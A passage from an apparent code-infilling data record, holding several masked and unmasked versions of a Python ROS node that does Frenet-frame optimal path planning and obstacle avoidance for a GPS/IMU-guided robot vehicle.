[]\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\n<mask token>\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n mincost = float('inf')\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\n<mask token>\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\ndef calc_global_paths(fplist, csp):\n for fp in fplist:\n for i in range(len(fp.s)):\n ix, iy = csp.calc_position(fp.s[i])\n if ix is None:\n break\n iyaw = csp.calc_yaw(fp.s[i])\n di = fp.d[i]\n fx = ix + di * math.cos(iyaw + math.pi / 2.0)\n fy = iy + di * math.sin(iyaw + math.pi / 2.0)\n fp.x.append(fx)\n fp.y.append(fy)\n for i in range(len(fp.x) - 1):\n dx = fp.x[i + 1] - fp.x[i]\n dy = fp.y[i + 1] - fp.y[i]\n fp.yaw.append(math.atan2(dy, dx))\n fp.ds.append(math.sqrt(dx ** 2 + dy ** 2))\n fp.yaw.append(fp.yaw[-1])\n fp.ds.append(fp.ds[-1])\n for i in range(len(fp.yaw) - 1):\n fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])\n return fplist\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n mincost = float('inf')\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\ndef get_arc_length(tx, ty, st):\n arc_length = 0\n for x in range(1, st):\n arc_length = arc_length + np.hypot(tx[x - 1] - tx[x], ty[x - 1] - ty[x]\n )\n return arc_length\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nMAX_SPEED = 30.0\nMAX_ACCEL = 50.0\nMAX_CURVATURE = 30.0\nMAX_ROAD_WIDTH = 10.0\nD_ROAD_W = 2.0\nDT = 0.3\nMAXT = 6.0\nMINT = 4.0\nTARGET_SPEED = 15.0 / 3.6\nD_T_S = 10.0 / 3.6\nN_S_SAMPLE = 0.1\nROBOT_RADIUS = 2.3\nTHRESH_DIST = 0.01\nKJ = 0.8\nKT = 0.1\nKD = 20.0\nKLAT = 0.8\nKLON = 0.2\nshow_animation = True\nGob_x = []\nGob_y = []\nPathFail_flag = 0\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + 